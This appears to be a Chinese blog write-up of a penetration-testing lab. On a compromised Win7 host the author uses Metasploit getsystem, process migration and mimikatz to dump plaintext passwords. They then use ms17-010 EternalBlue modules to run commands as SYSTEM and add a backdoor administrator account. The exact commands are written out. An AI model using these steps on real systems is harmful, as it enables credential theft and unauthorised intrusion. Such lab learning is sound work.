mimikatz提權
首先對已經getshell的Win7主機進行提權。
用msf自帶的getsystem提權,直接執行命令:getsystem
網上查到可以用mimikatz抓取明文密碼。
MSF中自帶mimikatz模塊,同時支持32位和64位,默認加載32位,64位須先查看系統進程列表,然后將meterpreter進程遷移到一個64位程序的進程中,才能加載mimikatz並且查看系統明文。
首先查看系統信息,是64位win7系統:
執行命令ps,找一個64位的進程,比如516:
遷移進程:migrate 516,加載mimikatz:load mimikatz
執行這個命令:mimikatz_command -f sekurlsa::searchPasswords。抓到明文密碼>_<。。hmmm...有種背后一涼的感覺。。這明顯是個強密碼啊。。所以為啥能直接把密碼抓出來>_<,得抽空去看下mimikatz的工作原理
還有一位大大介紹用這個命令跑:mimikatz_command -f samdump::hashes,沒有跑出來,可能是不同模式的原因,拿個小本本先記下來,后續專門看下。。。
上一篇內網信息收集的時候已經找到同域的另外兩台主機了,對於我這種菜鳥,不掃描一下是不行的,那么現在的問題就是怎么對另外兩台主機進行掃描。。
其實Win7這台機器上已經安裝了nmap,如果沒有裝,是不是可以自己丟一個上去。。。但會不會太明顯了>_<
永恆之藍
先掃 一下192.168.52.141(GOD域上的主機名為ROOT-TVI862UBEH),找到一處漏洞ms17-010,搜了一下ms17-010就是永恆之藍。
使用msf現成的模塊:use exploit/windows/smb/ms17_010_eternalblue,並設置好參數,木有成功>_<
換一個:use auxiliary/admin/smb/ms17_010_command
看下用戶權限:set command whoami,拿到system權限(^-^)V
添加用戶:set command net user tests qwer@1234 /add (注意密碼規則,弱密碼無法創建成功)
給新用戶管理員權限:set command net localgroup administrators tests /add
看下用戶是否添加成功:set command net user tests
這步之后要做的是打開遠程桌面-》配置socks4a代理-》proxychains rdesktop 登錄,試了下我用proxychains沒法遠程連接>_<!! 原因不明(小本本先記下來) 。
最后看到還有一個模塊:windows/smb/ms17_010_psexec
嘗試了一下,在運行過程中2003那台機器直接藍屏重啟了2333....
永恆之藍這個漏洞我磕了好幾天都木有搞定,ε=(´ο`*)))唉,暫時放棄了。。。接下來的一些利用方法我暫時理解不了,先到此為止了。
本文僅用於技術學習和交流,嚴禁用於非法用途,否則產生的一切后果自行承擔。
如需轉載,請注明出處,這是對他人勞動成果的尊重。